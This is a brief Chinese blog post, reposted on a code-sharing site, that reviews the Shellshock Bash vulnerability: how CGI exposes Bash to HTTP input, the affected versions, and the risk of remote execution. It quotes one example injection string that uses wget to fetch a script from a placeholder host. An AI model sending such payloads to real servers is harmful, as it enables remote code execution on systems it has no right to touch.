码迷,mamicode.com
首页 > 系统相关 > 详细

shellshock漏洞回顾

时间:2018-09-14 11:01:49      阅读:187      评论:0      收藏:0      [点我收藏+]

标签:perl   解释   技术   脚本   请求   才有   rev   php   调用   

review
  • 定位漏洞缘由
    部分大佬认为uCGI技术的普及是个错误,正是因为CGI技术的不合理之处,Shellshock才有机可乘。
CGI技术是Web技术刚兴起的时候发明的,它是最早的可以创建动态网页内容的技术之一。它会把一个HTTP请求转化为一次shell调用。CGI (Common Gateway Interface),是一种基于浏览器的输入,在Web服务器上运行程序的方法。
  • 风险预估

起初以为这个仅仅是个本地执行的漏洞。后面发现亦可作为远程×××。

远程×××面:正是由于后台处理程序不仅仅可以用PHP、Python、Perl等脚本来接受请求、解释执行、响应客户端,当然还可以用Bash脚本来解释执行用户提交的GET或POST请求。

Bash漏洞其实是非常经典的“注入式×××”,也就是可以向 bash注入一段命令,从bash1.14 到4.3都存在这样的漏洞。

() { :;}; wget http://www.XXX.com/testvul.sh

对于利用Bash脚本处理用户请求的网站,×××者可以精心伪造数据,通过网络传到一台服务器上,直接或间接触发一个bash脚本,这样就可以远程执行恶意代码。

通过特定格式的指令设置环境变量,进而在执行bash脚本时会先执行把我们设置的环境变量执行。

shellshock分析与回顾:
http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm

shellshock真实案列:

http://www.freebuf.com/articles/system/45390.html

×××前提:必须得在有漏洞的机器上执行我们的bash代码。

课程参考:
https://www.shiyanlou.com/courses/230

shellshock漏洞回顾

标签:perl   解释   技术   脚本   请求   才有   rev   php   调用   

原文地址:http://blog.51cto.com/10509896/2174506

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!